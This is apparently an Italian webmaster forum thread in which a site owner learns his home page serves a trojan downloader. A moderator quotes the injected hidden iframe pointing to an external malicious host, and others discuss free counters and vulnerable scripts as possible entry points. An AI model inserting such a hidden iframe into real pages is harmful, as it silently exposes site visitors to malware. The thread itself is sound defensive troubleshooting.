Un amico mi scrive quanto segue:
"Roberto un saluto e scusami per il messaggio che sto per inviarti, anche perché sarai già stato avvisato. Oggi entrando nel tuo sito l'antivirus mi ha informato che è stato bloccato un virus .... ho riprovato più volte ad entrare nel sito e tutte le volte compare il messaggio per avvertirmi".
Scusate l'ignoranza (ho un Mac) ma è possibile una cosa del genere e se sì qualcuno può controllare e dirmi?
Il sito è la mia "home" qui sotto.
Grazie
in effetti viene scaricato Trojan-Downloader.JS.Agent.bx
In questo caso i responsabili sono quasi sempre servizi di statistica gratuiti ma con la sorpresina...
nel tuo caso direi che la riga incriminata è:
codice:<iframe SRC="http://walkcave.com/stat4/index.php" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
Grazie mille, davvero. Confesso la mia ingoranza su tutto ciò che riguarda i virus. Ma la stringa come c'è finita sulla index? Temo di conoscere la risposta: qualcuno ha l'accesso alla root del sito, vero? In questo caso basta cambiare user e psw o ci sono altre azioni da mettere in atto?
E poi, c'è solo sulla index o anche su altri file.
Grazie ancora
come ci sia finita non saprei...
sul tuo sito hai parti dinamiche o di interazione con l'utente? (forum, moduli di richiesta, guestbooks etc..). Potrebbe esserci qualche vulnearbilità su una di queste sezioni.
Ho dato una occhiata veloce e a parte l'uso delle estensioni SSI non vedo nessuna parte dinamica....
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
Quasi niente a parte phpstats e PhdAdsNew che ho recentemente aggiornato e che penso sia il primo indiziato. Avevo montato, in passato, qualche cgi che poi ho tolto.
Ciao , il nostro moderatore ha risolto anche a me un problema simile al tuo, sul mio sito avevo come contatore freestat da cui partivano dialer e popup, ho seguito il consiglio di Habanero e eliminando il counter pare essere sparito il problema.
ciao
gfloriano
http://www.fantacomix.it
Nel mio caso si trattava proprio della stringa walkcave.com riportata dal Mod e che ho trovato nientemeno che in home page (in mezzo a tutto l'altro codice): in pratica è come se l'avessi aggiunta io a mano (sono l'unico che ci lavora). Ora l'ho cancellata e stasera verifico che non ci sia in altre pagine del sito. Possibile che mi abbiano hackerato il sito per aggiungere un'idiozia del genere? Mi sembra davvero tempo buttato via...
come dice gfloriano più probabilmente era inclusa in una porzione di codice di qualche servizio gratuito che hai inserito nel sito, tipo contatori o servizi banner
mah?! Un paio d'anni fa avevo Shiny che poi ho eliminato
Comunque grazie a tutti
Permessi di invio
Rispondi quotando